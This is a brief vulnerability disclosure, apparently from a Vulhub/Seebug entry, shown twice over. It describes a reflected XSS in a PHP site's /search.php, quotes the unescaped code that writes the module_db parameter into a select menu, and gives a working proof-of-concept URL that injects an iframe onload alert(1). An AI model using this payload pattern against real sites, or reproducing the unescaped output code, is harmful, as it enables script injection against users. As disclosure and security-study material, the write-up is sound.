VULHUB ™

<ul><li>/search.php</li></ul><pre class="">$module_select="&lt;select name='mid' onChange=\"window.location.href='?mid='+this.options[this.selectedIndex].value\"&gt;&lt;option value='0' style='color:#aaa;'&gt;所有模型&lt;/option&gt;"; foreach($module_db AS $key=&gt;$value){ $ckk=$mid==$key?' selected ':' '; $module_select.="&lt;option value='$key' $ckk&gt;$value&lt;/option&gt;"; } $module_select.="&lt;/select&gt;"; if($mid){ $SQL=" AND mid='$mid' "; </pre><p>module_db可控，带入到HTML里，可以直接反射型XSS。</p><p>访问地址：</p><pre class="">http://10.211.55.3/fenlei/search.php?module_db[]=%3C/option%3E%3C/select%3E%3Ciframe%20onload=alert%281%29;%3E%3C!--</pre><p>弹窗：</p><p><img alt="3FA854AD-E4F2-4F38-AA86-5BC205E9AE9B.png" src="https://images.seebug.org/@/uploads/1434682958638-3FA854AD-E4F2-4F38-AA86-5BC205E9AE9B.png" data-image-size="1608,782"><br></p>

<ul><li>/search.php</li></ul><pre class="">$module_select="&lt;select name='mid' onChange=\"window.location.href='?mid='+this.options[this.selectedIndex].value\"&gt;&lt;option value='0' style='color:#aaa;'&gt;所有模型&lt;/option&gt;"; foreach($module_db AS $key=&gt;$value){ $ckk=$mid==$key?' selected ':' '; $module_select.="&lt;option value='$key' $ckk&gt;$value&lt;/option&gt;"; } $module_select.="&lt;/select&gt;"; if($mid){ $SQL=" AND mid='$mid' "; </pre><p>module_db可控，带入到HTML里，可以直接反射型XSS。</p><p>访问地址：</p><pre class="">http://10.211.55.3/fenlei/search.php?module_db[]=%3C/option%3E%3C/select%3E%3Ciframe%20onload=alert%281%29;%3E%3C!--</pre><p>弹窗：</p><p><img alt="3FA854AD-E4F2-4F38-AA86-5BC205E9AE9B.png" src="https://images.seebug.org/@/uploads/1434682958638-3FA854AD-E4F2-4F38-AA86-5BC205E9AE9B.png" data-image-size="1608,782"><br></p>